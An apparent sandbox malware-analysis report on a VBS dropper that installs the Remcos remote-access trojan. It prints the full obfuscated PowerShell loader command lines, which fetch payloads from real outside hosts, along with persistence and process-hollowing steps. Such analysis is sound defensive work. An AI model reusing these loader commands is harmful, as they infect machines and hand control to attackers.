            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs"
            Imagebase:0x280000
            File size:141'824 bytes
            MD5 hash:979D74799EA6C8B8167869A68DF5204A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:10
            Start time:03:00:42
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRQBXDgTreEgDgTreLwDgTrewDgTreDDgTreDgTreNQDgTrewDgTreDDgTreDgTreMQDgTrevDgTreDQDgTreNQDgTrexDgTreC4DgTreODgTreDgTre3DgTreDEDgTreLgDgTre2DgTreDQDgTreLgDgTre4DgTreDkDgTreMQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreaQBuDgTreGMDgTrebwBuDgTreHQDgTrecgBvDgTreHYDgTreZQByDgTreHQDgTreaQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
            Imagebase:0x1300000
            File size:427'008 bytes
            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            General

            Target ID:12
            Start time:03:00:43
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Imagebase:0x1300000
            File size:427'008 bytes
            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            Reputation:moderate
            Has exited:true

            General

            Target ID:13
            Start time:03:00:56
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs
            Imagebase:0x1300000
            File size:427'008 bytes
            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            General

            Target ID:15
            Start time:03:00:57
            Start date:27/05/2024
            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Imagebase:0x1160000
            File size:64'704 bytes
            MD5 hash:8FE9545E9F72E460723F484C304314AD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            General

            Target ID:16
            Start time:03:00:58
            Start date:27/05/2024
            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Imagebase:0x1160000
            File size:64'704 bytes
            MD5 hash:8FE9545E9F72E460723F484C304314AD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            General

            Target ID:17
            Start time:03:00:58
            Start date:27/05/2024
            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Imagebase:0x1160000
            File size:64'704 bytes
            MD5 hash:8FE9545E9F72E460723F484C304314AD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            Reputation:moderate
            Has exited:false

            General

            Target ID:19
            Start time:03:01:08
            Start date:27/05/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs"
            Imagebase:0xff640000
            File size:168'960 bytes
            MD5 hash:045451FA238A75305CC26AC982472367
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:20
            Start time:03:01:16
            Start date:27/05/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs"
            Imagebase:0xfffc0000
            File size:168'960 bytes
            MD5 hash:045451FA238A75305CC26AC982472367
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Disassembly

            Code Analysis

            Call Graph

            • Entrypoint
            • Decryption Function
            • Executed
            • Not Executed
            • Show Help
            callgraph 1 Error: Graph is empty

            Module: Sheet1

            Declaration
            LineContent
            1

            Attribute VB_Name = "Sheet1"

            2

            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Module: Sheet2

            Declaration
            LineContent
            1

            Attribute VB_Name = "Sheet2"

            2

            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Module: Sheet3

            Declaration
            LineContent
            1

            Attribute VB_Name = "Sheet3"

            2

            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Module: ThisWorkbook

            Declaration
            LineContent
            1

            Attribute VB_Name = "ThisWorkbook"

            2

            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Reset < >

              Executed Functions

              Function 001AD006 Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.545886808.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_1ad000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fa9d34ac28f12b7542005d69655c0ea47c7f0c6eca5d059877a755ccc096203a
              • Instruction ID: 615d0341a7808fed3fdec0a0790ad3fe8264fc587984e8b637a798735787a06d
              • Opcode Fuzzy Hash: fa9d34ac28f12b7542005d69655c0ea47c7f0c6eca5d059877a755ccc096203a
              • Instruction Fuzzy Hash: DE018C6100D3C09FD7124B259D94752BFB4EF53624F1984CBE8858F2A3C2685C45CB72
              Function 001AD01D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.545886808.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_1ad000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3a71b0e0fc63982a0e146dbf61c3ac55622c39d092c6b976f8f654292ac8660a
              • Instruction ID: 8ce535ca207abd58cd4e787d88a0a07b2820c57af7fad27d77aa733734d80baf
              • Opcode Fuzzy Hash: 3a71b0e0fc63982a0e146dbf61c3ac55622c39d092c6b976f8f654292ac8660a
              • Instruction Fuzzy Hash: 0E01F774104740EEE7144E25DD84B67BBD8DF52764F28C419FC4A0F682C3799941CAB1

              Execution Graph

              Execution Coverage:9.1%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:33.3%
              Total number of Nodes:24
              Total number of Limit Nodes:2
              execution_graph 5894 256031 5896 255642 5894->5896 5895 256093 5896->5895 5897 258828 WriteProcessMemory 5896->5897 5902 258bc0 5896->5902 5906 2585d0 5896->5906 5910 2585c9 5896->5910 5914 2584e0 5896->5914 5897->5896 5903 258c47 CreateProcessA 5902->5903 5905 258ea5 5903->5905 5907 258619 Wow64SetThreadContext 5906->5907 5909 258697 5907->5909 5909->5896 5911 2585d0 Wow64SetThreadContext 5910->5911 5913 258697 5911->5913 5913->5896 5915 258524 ResumeThread 5914->5915 5917 258576 5915->5917 5917->5896 5918 255498 5920 2554cb 5918->5920 5919 256093 5920->5919 5921 258bc0 CreateProcessA 5920->5921 5922 258828 WriteProcessMemory 5920->5922 5923 2584e0 ResumeThread 5920->5923 5924 2585d0 Wow64SetThreadContext 5920->5924 5925 2585c9 Wow64SetThreadContext 5920->5925 5921->5920 5922->5920 5923->5920 5924->5920 5925->5920

              Executed Functions

              Function 00255498 Relevance: 3.2, Strings: 2, Instructions: 675COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 433 255498-2554c9 434 2554d0-255538 433->434 435 2554cb 433->435 437 255549-25563d call 252fbc call 254e6c call 251bb8 434->437 438 25553a-255541 call 2577e6 434->438 435->434 453 256076-25608d 437->453 439 255547-255548 438->439 439->437 454 256093-25609a 453->454 455 255642-25573c call 258bc0 453->455 462 255764-2557ce 455->462 463 25573e-255759 455->463 469 2557d5-255801 462->469 470 2557d0 462->470 463->462 472 255807-25585c 469->472 473 25588b-2558e0 469->473 470->469 478 255884-255886 472->478 479 25585e-255879 472->479 480 2558e2-2558fd 473->480 481 255908 473->481 482 255909-255913 478->482 479->478 480->481 481->482 485 255915 482->485 486 25591a-255984 482->486 485->486 491 255986-2559a1 486->491 492 2559ac-2559c5 486->492 491->492 493 2559c7-255a15 492->493 494 255a3d-255af2 492->494 493->494 501 255a17-255a32 493->501 505 255af4-255b0f 494->505 506 255b1a-255b7b call 258828 494->506 501->494 505->506 512 255ba3-255bde 506->512 513 255b7d-255b98 506->513 516 255d5e-255d7d 512->516 513->512 517 255be3-255c70 516->517 518 255d83-255dfe call 258828 516->518 526 255c76-255d05 call 258828 517->526 527 255d50-255d58 517->527 528 255e26-255e5c 518->528 529 255e00-255e1b 518->529 543 255d07-255d27 526->543 527->516 533 255e67-255e7d 528->533 534 255e5e-255e61 528->534 529->528 536 255e84-255eaf 533->536 537 255e7f 533->537 534->533 541 255eb5-255ee5 536->541 542 255f39-255f8e 536->542 537->536 574 255ee8 call 2585d0 541->574 575 255ee8 call 2585c9 541->575 553 255fb6 542->553 554 255f90-255fab 542->554 545 255d4f 543->545 546 255d29-255d44 543->546 545->527 546->545 548 255eea-255f0a 551 255f32-255f34 548->551 552 255f0c-255f27 548->552 556 255fb7-255fe3 call 2584e0 551->556 552->551 553->556 554->553 562 255fe5-256005 556->562 563 256007-256022 562->563 564 25602d-256071 562->564 563->564 564->453 564->454 574->548 575->548
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: ($PC
              • API String ID: 0-1001392370
              • Opcode ID: f4dc662b2717a36257d972d43ff539781bc390afa53dd250446d7b0eaf2d3458
              • Instruction ID: 7f894aabc682bcab157a69630818219aa158386e20a423c75a8f7df70cd6ba1a
              • Opcode Fuzzy Hash: f4dc662b2717a36257d972d43ff539781bc390afa53dd250446d7b0eaf2d3458
              • Instruction Fuzzy Hash: E362B074A11228CFDB68DF65C894BDDBBB2BF89305F1081EAD419A7291DB346E85CF40
              Function 002551F0 Relevance: .4, Instructions: 450COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
